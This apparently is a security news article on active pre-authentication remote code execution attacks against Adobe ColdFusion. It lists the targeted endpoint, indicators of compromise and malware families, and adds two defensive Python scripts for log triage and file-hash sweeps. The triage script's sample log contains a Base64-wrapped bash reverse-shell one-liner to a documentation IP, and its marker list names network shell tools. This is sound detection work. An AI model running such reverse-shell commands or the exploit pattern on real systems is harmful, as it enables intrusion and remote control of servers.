Adobe ColdFusion is a Java-based, commercial web application development platform that uses CFML (ColdFusion Markup Language) for server-side programming.
ColdFusion is best known for its tag-based approach, and it remains popular with developers because of its adaptability across many industries.
Security researchers at Fortinet recently reported that Adobe ColdFusion installations on Windows and macOS are exposed to vulnerabilities that remote attackers are actively exploiting for pre-authentication remote code execution (RCE).
Technical Analysis
Attackers target the URI ‘/CFIDE/adminapi/accessmanager.cfc’, sending a POST request in which the ‘argumentCollection’ parameter carries the injected payload.
Researchers spotted probing activity in July that used interactsh, an open-source tool that generates unique domain names so that out-of-band callbacks (DNS or HTTP) from a target can be recorded, which confirms whether an exploit attempt actually fired.
Probing activities involving interactsh tool (Source – Fortinet)
Threat actors can misuse the same technique to validate a vulnerability by watching for callbacks to domains they control. The researchers collected the following related domains:-
- mooo-ng[.]com
- redteam[.]tf
- h4ck4fun[.]xyz
Probing activities involving other domains (Source – Fortinet)
Once the ColdFusion exploit succeeds, attackers deliver a Base64-encoded payload that launches a reverse shell back to their infrastructure.
The attacks were traced to several source IP addresses, listed below:-
- 81[.]68[.]214[.]122
- 81[.]68[.]197[.]3
- 82[.]156[.]147[.]183
The malware was distributed from a publicly accessible HTTP file server:-
- 103[.]255[.]177[.]55[:]6895
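The request pattern, the callback domains and the IP addresses above are enough to build a first-pass log triage. The following is an added example (not Fortinet's code or part of the original article) that scans request records for a POST to ‘/CFIDE/adminapi/accessmanager.cfc’, an ‘argumentCollection’ parameter, a source IP from the IoC list, a reference to the malware server or callback domains, and a Base64-encoded reverse-shell command in the payload. The ‘src_ip|method|path|query|body’ record format, the sample records, and the 198.51.100.0/24 and 203.0.113.0/24 addresses are constructed for the example; a real deployment would feed it from a WAF or reverse-proxy log that captures request bodies.

```python
import base64
import binascii
import re

# Network indicators quoted in the article, with the de-fanging brackets removed
# so they compare directly against raw log fields.
ATTACKER_IPS = {"81.68.214.122", "81.68.197.3", "82.156.147.183"}
MALWARE_SERVER = "103.255.177.55:6895"
CALLBACK_DOMAINS = ("mooo-ng.com", "redteam.tf", "h4ck4fun.xyz")
TARGET_PATH = "/cfide/adminapi/accessmanager.cfc"

# Substrings that typically appear in a reverse-shell one-liner once decoded.
SHELL_MARKERS = ("/dev/tcp/", "bash -i", "nc -e", "ncat ", "socat ", "socket(")

# Runs of base64 alphabet long enough to be a command rather than a random token.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def decode_embedded_base64(text):
    """Decode every plausible base64 blob inside *text*; skip ones that are not valid base64."""
    out = []
    for tok in B64_TOKEN.findall(text):
        try:
            out.append(base64.b64decode(tok, validate=True).decode("utf-8", errors="replace"))
        except (binascii.Error, ValueError):
            continue
    return out


def looks_like_reverse_shell(text):
    """True if the text, or any base64 blob it carries, contains a reverse-shell marker."""
    for candidate in [text] + decode_embedded_base64(text):
        if any(marker in candidate for marker in SHELL_MARKERS):
            return True
    return False


def parse_record(line):
    """Parse the constructed 'src_ip|method|path|query|body' record format used below."""
    src_ip, method, path, query, body = line.rstrip("\n").split("|", 4)
    return {"src_ip": src_ip, "method": method, "path": path, "query": query, "body": body}


def triage(rec):
    """Return the list of reasons a request record is suspicious (empty if none)."""
    reasons = []
    payload = rec["query"] + " " + rec["body"]
    if rec["method"].upper() == "POST" and rec["path"].lower() == TARGET_PATH:
        reasons.append("POST to /CFIDE/adminapi/accessmanager.cfc")
    if "argumentcollection" in payload.lower():
        reasons.append("argumentCollection parameter present")
    if rec["src_ip"] in ATTACKER_IPS:
        reasons.append("source IP in IoC list")
    if looks_like_reverse_shell(payload):
        reasons.append("reverse-shell command in payload")
    if MALWARE_SERVER in payload or any(d in payload for d in CALLBACK_DOMAINS):
        reasons.append("payload references known malware/callback host")
    return reasons


def scan(lines):
    """Triage every record; return [(src_ip, reasons)] for the records that hit."""
    hits = []
    for line in lines:
        rec = parse_record(line)
        reasons = triage(rec)
        if reasons:
            hits.append((rec["src_ip"], reasons))
    return hits


# Constructed sample log (not real traffic). The reverse-shell command is encoded
# here rather than pasted so the base64 is exact; 198.51.100.7 is a documentation address.
SAMPLE_SHELL_B64 = base64.b64encode(b"bash -i >& /dev/tcp/198.51.100.7/4444 0>&1").decode()
SAMPLE_LOG = [
    "203.0.113.9|GET|/index.cfm||",
    "81.68.214.122|POST|/CFIDE/adminapi/accessmanager.cfc||"
    f'argumentCollection={{"cmd":"echo {SAMPLE_SHELL_B64} | base64 -d | bash"}}',
    "198.51.100.20|GET|/CFIDE/adminapi/accessmanager.cfc|argumentCollection=http://redteam.tf/x|",
]

if __name__ == "__main__":
    for ip, reasons in scan(SAMPLE_LOG):
        print(ip, "->", "; ".join(reasons))
```

The checks are deliberately independent: a POST to the admin API from an unknown address with no decodable payload still surfaces, and a known attacker IP hitting an unrelated path still surfaces, so the triage is useful even when body logging is incomplete.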
Malware Variants
The security analysts identified the following malware variants:-
- XMRig Miner: Open-source mining software that uses CPU cycles to mine Monero; it is used both legitimately and for cryptojacking.
- DDoS/Lucifer: A hybrid bot, first reported in 2020, that combines cryptojacking, DDoS attacks, C2 communication, and vulnerability exploitation.
- RudeMiner: Another hybrid malware bot that targets cryptocurrency wallets and carries out DDoS attacks.
- BillGates/Setag: A backdoor mainly known for hijacking, C2 server communication, and launching attacks. The sample observed here checks for a file named “bill.lock”, so the presence of that file is a usable host-level indicator of this malware.
Fortinet’s researchers have been tracking exploitation of this Adobe ColdFusion vulnerability for several weeks and continue to see attacks even though patches are available, so they urge administrators to upgrade to the latest version immediately.
IoCs
Attacker IP addresses:
- 81[.]68[.]214[.]122
- 81[.]68[.]197[.]3
- 82[.]156[.]147[.]183
Malware server IP address:
- 103[.]255[.]177[.]55[:]6895
Files (SHA-256):
- 7c6f0bae1e588821bd5d66cd98f52b7005e054279748c2c851647097fa2ae2df
- 590d3088ed566cb3d85d48f4914cc657ee49b7d33e85c72167e7c72d81d4cb6c
- 808f0f85aee6be3d3f3dd4bb827f556401c4d69a642ba4b1cb3645368954622e
- 4f22fea4d0fadd2e01139021f98f04d3cae678e6526feb61fa8a6eceda13296a
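On a host suspected of compromise, the file hashes above and the “bill.lock” check described under BillGates/Setag translate directly into a filesystem sweep. The following is an added example (not Fortinet's code or part of the original article) that walks a directory tree, hashes every file with SHA-256, reports any match against the IoC list, and reports any file literally named bill.lock. The `demo()` function builds a constructed directory with a harmless file, a constructed “sample” whose hash is added to the IoC set for the demonstration, and an empty bill.lock; the lock file's location on a real host is not specified by the article, which is why the sweep matches on name anywhere under the root rather than on a fixed path.

```python
import hashlib
import os
import tempfile

# SHA-256 file hashes listed in the article's IoC section.
IOC_HASHES = {
    "7c6f0bae1e588821bd5d66cd98f52b7005e054279748c2c851647097fa2ae2df",
    "590d3088ed566cb3d85d48f4914cc657ee49b7d33e85c72167e7c72d81d4cb6c",
    "808f0f85aee6be3d3f3dd4bb827f556401c4d69a642ba4b1cb3645368954622e",
    "4f22fea4d0fadd2e01139021f98f04d3cae678e6526feb61fa8a6eceda13296a",
}
# File name the article reports BillGates/Setag checking for.
LOCK_FILE_NAME = "bill.lock"


def sha256_file(path, chunk=1 << 20):
    """Stream a file through SHA-256 so large binaries do not have to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def sweep(root, ioc_hashes=IOC_HASHES, lock_name=LOCK_FILE_NAME):
    """Walk *root* and return (path, reason) pairs for hash hits and lock-file hits."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if name == lock_name:
                findings.append((path, "file name matches BillGates/Setag bill.lock indicator"))
            try:
                digest = sha256_file(path)
            except OSError:
                continue  # unreadable, vanished, or special file (e.g. under /proc): skip
            if digest in ioc_hashes:
                findings.append((path, f"sha256 {digest} matches IoC list"))
    return findings


def demo():
    """Sweep a constructed directory tree; returns the sorted reasons found."""
    with tempfile.TemporaryDirectory() as root:
        with open(os.path.join(root, "notes.txt"), "w") as f:
            f.write("harmless file\n")
        os.makedirs(os.path.join(root, "tmp"))
        open(os.path.join(root, "tmp", LOCK_FILE_NAME), "w").close()
        sample = os.path.join(root, "tmp", "dropped.bin")
        with open(sample, "wb") as f:
            f.write(b"constructed sample, not real malware\n")
        # Assumption for the demo: treat the constructed sample's hash as an IoC
        # so the hash-match path is exercised without shipping real malware.
        iocs = IOC_HASHES | {sha256_file(sample)}
        return sorted(reason for _path, reason in sweep(root, iocs))


if __name__ == "__main__":
    for reason in demo():
        print(reason)
```

Run `sweep("/")` (or the web-server and temp directories first) on a live host; hashes are exact-match only, so a rebuilt or repacked binary will not hit and the name-based lock-file check is the complementary signal.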